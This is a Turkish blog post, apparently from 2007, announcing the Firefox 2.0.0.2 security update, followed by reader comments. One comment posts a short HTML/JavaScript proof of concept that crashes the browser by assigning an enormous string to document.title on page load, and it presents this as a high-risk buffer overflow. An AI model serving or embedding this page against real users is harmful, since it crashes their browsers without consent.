Yeni Firefox versiyonu Firefox 2.0.0.2 bizlerle

24.02.2007

Okuyucu : 1.482
Günlük Okuyucu : 3,3

Son günlerdeki güvenlik açıkları giderilmiş. Cross-domain cookie set etmece, çeşitli spoofing açıkları, adobe XSS açığı vs.

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

IE olsaydi,1 ay beklerdik
Firefox rulazz IE sux =)

koray [ # | 24.02.2007 ]

Evet bende birçok bug buldum buffer overflow mesela..

Software : Firefox
Homepage : http://www.mozilla.com/
Vulnerable : 2.0.0.2
Risk : High
author : koray ~ manyak@mypower.org

Tested with Firefox 2.0.0.2 and IE 6.0 on Windows XP SP2
open in page or browser crash to buffer overflow


This POC code crashes Mozilla Firefox:

</html><head>
<title>sux</title>
<script language="javascript">
function sux() {
var buffer = "";
for (var i = 0; i < 9000; i++) {
buffer += "SUXXXXXXXXXXXXXXXXX";
}
var buffer2 = buffer;
for (i = 0; i < 900; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head><body onload="sux();">sux ( ;
</body></html>

ve digeri ise otomatik olarak bir dosya yüklenebiliyor .. yeni sürümünü cikarttirlar ne de olsa firefox bug cikti mi yamarlar =)


manyak [at] mypower.org [ # | 25.02.2007 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Yeni Firefox versiyonu Firefox 2.0.0.2 bizlerle ile İlişkili Olabilecek Yazılar - Haberler

Bilişim Rüzgarı Röportajı
Hayatınızı Rahatlatan Programlar
Password Proxy
Firefox Master Password Dialog Weakness
Windows Live Writer Beta 3

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Haberler » Yeni Firefox versiyonu Firefox 2.0.0.2 bizlerle

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında